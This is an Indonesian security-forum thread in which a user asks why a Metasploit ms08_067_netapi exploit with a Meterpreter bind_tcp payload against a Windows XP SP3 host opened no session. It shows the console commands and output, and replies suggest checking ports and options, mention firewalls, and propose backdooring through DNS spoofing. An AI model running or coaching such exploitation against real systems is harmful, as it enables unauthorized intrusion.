Sessi meterpreter tidak keluar
#1
permisi brother-brother, ane mau tanya nih soal metasploit ane,, ko sessi meterpreternya ga ke buka ya...?? padahal metasploitnya udah ane update ke versi 4.3

jadi seperti ini keluarnya


msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.0.1

rhost => 192.168.0.1

msf exploit(ms08_067_netapi) > set lhost 192.168.0.2

lhost => 192.168.0.2

msf exploit(ms08_067_netapi) > exploit


[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

msf exploit(ms08_067_netapi) >


nah sessi meterpreternya ga keluar ? apakah exploit gagal di execute?
kalo gagal kenapa tidak ada pesen error ? :badpc:


ket.
victim : Win xp sp3 2011


mohon bimbingannya..

#2
xp xp3 2011 sdah di patch .. lagipula apakah port 445 terbuka ?
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#3
(04-20-2012, 12:28 AM)zee eichel Wrote: xp xp3 2011 sdah di patch .. lagipula apakah port 445 terbuka ?

Quote: ane udeh scan pake nmap, dn hasilnya port 445 udah ke buka lebar

#4
set rportnya mana???g dset th om.,jd metasptloit nya mw sending trigger ke victim lwat port mana dung??

set lportnya jg,,si attacker maw listening nya diport berapa donk??

lihat exploit optionsnya om

>show options

ntar ada variabel yang mesti diisi dan tak mesti diisi,minimal require lah gitu,,

CMIIW

#5
(04-20-2012, 04:57 AM)junior.riau18 Wrote: set rportnya mana???g dset th om.,jd metasptloit nya mw sending trigger ke victim lwat port mana dung??

set lportnya jg,,si attacker maw listening nya diport berapa donk??

lihat exploit optionsnya om

>show options

ntar ada variabel yang mesti diisi dan tak mesti diisi,minimal require lah gitu,,

CMIIW
Quote: biasanya otomatis khan ke port 445,,, ???? kalo di set port manual ane rada bingung nentuinnya... :badpc:


#6
gk om itu memang untuk exploitasi port 445 atau smb port.. sebenarnya klo gk bisa itu karena adanya pertahanan firewall .. exploitasi langsung seperti ini ( non-backdooring ) atau triggered port sering di bantah ama firewall..
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#7
berarti windows xp sp 3 itu gak bisa di exploit ya om zee?

#8
kalo lewat exploit ms08_067_netapi udah ga vulnerable lagi... jadi harus pake teknik baru Tongue backdooring dengan cara dns_spoofing atau dengan cara lain di forum udah dibahas kok Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#9
ijin nyimak Om biar tambah pengetahuan Smile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆







Users browsing this thread: 1 Guest(s)